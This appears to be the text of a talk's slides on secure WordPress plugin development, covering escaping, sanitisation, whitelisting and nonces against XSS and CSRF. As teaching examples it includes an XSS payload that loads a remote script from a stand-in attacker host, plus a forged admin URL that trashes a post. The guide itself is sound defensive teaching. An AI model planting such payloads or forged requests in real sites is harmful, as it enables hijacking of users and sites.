Secure WordPress Development Practices

So you’re writing code for the masses, huh?Are you being responsible and protecting them from

getting pwned?

Watch This.http://wordpress.tv/2011/01/29/mark-jaquith-theme-plugin-security/

That guy pwned a plugin I wrote live on stage at

WordCamp New York.It changed my life.

Read This.http://wp.tutsplus.com/tutorials/creative-coding/data-sanitization-and-validation-with-wordpress/

tl;dr

• Keep your dev environment clean

• Escape your data output

• Sanitize your data inputs

• Validate referrers

• Core functionality should always trump your super awesome functionality

Keep Your Dev Environment Clean

Don’t think that just because you’re on a mac you’re safe from viruses.

If you’re on a PC, you should assume you’re already pwned.

Kaspersky Anti-Virus

• I use it.

• Dre uses it.

• Tony uses it.

• You should be using it.

Trust No One,Trust Nothing

XSS: Cross-site Scripting

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.

http://en.wikipedia.org/wiki/Cross-site_scripting

Escape All The Things On Outputhttp://codex.wordpress.org/Data_Validation#Output_Sanitation

• Bad data will be tamed

• esc_{context}

• esc_js - Escape single quotes, htmlspecialchar " < > &, and fix line endings.

• esc_html - Escaping for HTML blocks.

• esc_attr - Escaping for HTML attributes.

• esc_sql - Escapes data for use in a MySQL query.

• esc_url - Checks and cleans a URL.

• esc_textarea - Escaping for textarea values.

Sanitize All The Things On Inputhttp://codex.wordpress.org/Data_Validation#Input_Validation

• sanitize_* and similar functions help for most things

• $_POST = array(‘e’=>‘<script src=‘http://pwnd.com/u.js’></script>’)

• BAD: update_post_meta($id, ‘e’, $_POST[‘e’])

• GOOD: update_post_meta($id, ‘e’, sanitize_email($_POST[‘e’]))

• Note: Might unintentionally change data and give unexpected results

Whitelisting Datahttp://codex.wordpress.org/Data_Validation#Whitelist

• Whitelisting data - Only accept known data

• $_POST = array(‘pwn’=>‘<script src=‘http://pwnd.com/u.js’></script>’,‘e’=‘[email protected]’);

• BAD:

• foreach( $_POST as $key => $val ) :update_post_meta($id, $key, $val);endforeach;

• GOOD: update_post_meta($id, ‘e’, sanitize_email($_POST[‘e’]))

Blacklisting Datahttp://codex.wordpress.org/Data_Validation#Blacklist

• Blacklisting data - Only accept data if it’s in the proper format

• $_POST = array(‘e’=‘me@domain.’);

• if( is_email($_POST[‘e’]) )update_post_meta( $id, ‘e’, sanitize_email($_POST[‘e’]) );

CSRF: Cross-site Request Forgery

Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf[1]) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.[2] Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

http://en.wikipedia.org/wiki/Cross-site_request_forgery

Sweet, this might lead to my next big deal! ACCEPT!

zOMG WTF?!

http://mysite.com/wp-admin/post.php?post=307&action=trash

Nonces FTW!(http://codex.wordpress.org/WordPress_Nonces)

• Before the Request

• wp_nonce_url

• wp_create_nonce

• wp_nonce_field

• Verify the Request

• wp_verify_nonce

• check_admin_referer

Is there an API for that?

Professional WordPressPlugin Developmenthttp://amzn.to/plugindevbook